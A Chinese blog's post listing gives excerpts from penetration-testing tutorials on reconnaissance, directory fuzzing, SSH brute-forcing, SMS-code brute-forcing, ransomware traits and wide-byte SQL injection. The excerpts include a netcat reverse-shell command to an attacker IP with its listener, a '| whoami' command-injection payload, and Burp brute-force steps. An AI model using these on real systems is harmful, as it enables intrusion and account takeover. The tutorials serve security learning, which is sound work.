- 博客(7)
- 收藏
- 关注
RSS订阅原创 渗透测试基础入门篇
如果渗透目标为虚拟主机,那么通过ip反查到的域名很有价值,因为一台物理服务器上面可能运行多个虚拟主机。如果知道有哪些网站公用这台服务器,就有可能通过此台服务器上其他网站的漏洞获取服务器控制权,进而迂回获取渗透目标的权限,这种技术被称为“旁注”。就是一个用来查询域名是否被注册,以及注册域名的详细信息的数据库(如域名所有人,域名注册商)例如:mail.qq.com是qq.com的子域名,而qq.com是顶级域名.com的子域。检测脆弱性的漏洞(nmap的脚本)子域名指的是二级域名,二级域名是顶级域名的下一级。
2025-03-09 17:04:38
1598
原创 Linux基础介绍
相对路径:不是由根目录写起的,而是从当前路径引起,”../”的意思是上级目录(root@kali:/var/www/html#cd ../../log/)dev是Device(设备)的缩写,该目录下存放的是Linux的外部设备,在Linux中访问设备的方式和访问文件的方式是相同的。用户的主目录,在Linux中,每个用户都有一个自己的目录,一般该目录名是以用户的账号命名的(root用户在/root目录下)。这个目录存放着在不断扩充着的东西,我们习惯将那些经常被修改的目录放在这个目录下,包括日志文件等。
2025-02-26 00:10:34
1420
原创 目录FUZZ攻击实战
未知文件FUZZ是我们知道存在的文件夹之后对文件夹下面的文件进行测试,文件后缀类型有php,jsp,asp,zip,png,jpg,rar,7z,mp4等等。平时在漏洞挖掘中,如果没有成果或者有时候是一个{空白页面} {目录扫描不出来结果} {发现更多资产}就需要用到FUZZ技术。③加入| whoami,发现可以直接远程执行指令(rce漏洞---远程命令执行漏洞)①通过burp爆破抓包得知,参数do 有个值ping。②直接ping 127.0.0.1,发现可以返回数据。
2025-02-24 23:16:14
413
原创 利用SSH协议机制登录目标主机
并支持以下主要协议的爆破:AFP,Cisco AAA,Cisco身份验证,Cisco启用,CVS,Firebird,FTP,HTTP-FROM-GET,HTTP-FROM-POST,HTTP-GET,HTTP-HEAD,MYSQL,POP3。nc 192.168.48.132(攻击机IP) 8888 -e /bin/bash。针对ssh协议爆破,看ssh服务是否启动→看22号端口是否开启。目标主机开放了22和80端口,且为open状态。开启监听:#nc -lvp 8888。发现该文件没有可执行权限。
2025-02-22 23:41:53
506
原创 短信验证码爆破漏洞
一、漏洞原理:短信验证码服务端未对验证时间和输入次数做出限制,存在爆破的可能性。简单的系统存在可以直接爆破的可能性,但做过一些防护的系统进行一些绕过才能进行爆破,一般验证码分为4位或者6位。对于4位纯数字验证码:从0000-9999的10000,五分钟之内可以爆破出来。对于6位纯数字验证码:六位数字验证码1000000位,5分钟之内跑不完。9.将payload类型换成数值。7.点击添加payload位置。8.点击payload子模块。10.设定payload范围。11.设定生成数值格式。
2025-02-22 16:47:56
2546
原创 勒索病毒攻击
一、常见勒索病毒---GandCrab1.常见后缀:随机生成2.传播方式:RDP暴力破解,钓鱼邮件,捆绑软件、僵尸网络、漏洞传播等3.特征:样本执行完毕后自动删除,并会修改感染主机桌面背景,有后缀MANUAL.txt和DECRYPT.txt
2025-02-21 20:50:21
452
原创 SQL注入之宽字节注入
③用vim编辑器打开mysql.cnf查看需要修改的配置文件mysqld.cnf。是没法成功注入的,因为单引号闭合后 union 后面的语句不会执行。变成了一个汉字“運”,使用这种方法成功绕过转义,就是所谓的宽字节注入。查不到任何数据,才能回显 union 后面的查询结果)是因为有时候 sql 查询回显是有长度限制的,使用。⑤在mysqld.cnf配置文件中输入;④执行下述命令打开mysqld.cnf。宽字节中两个字节代表一个汉字,所以。,所以我们考虑能否在前面再加上。,这不就恰好对应编码中的。
2024-11-14 16:14:28
382
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人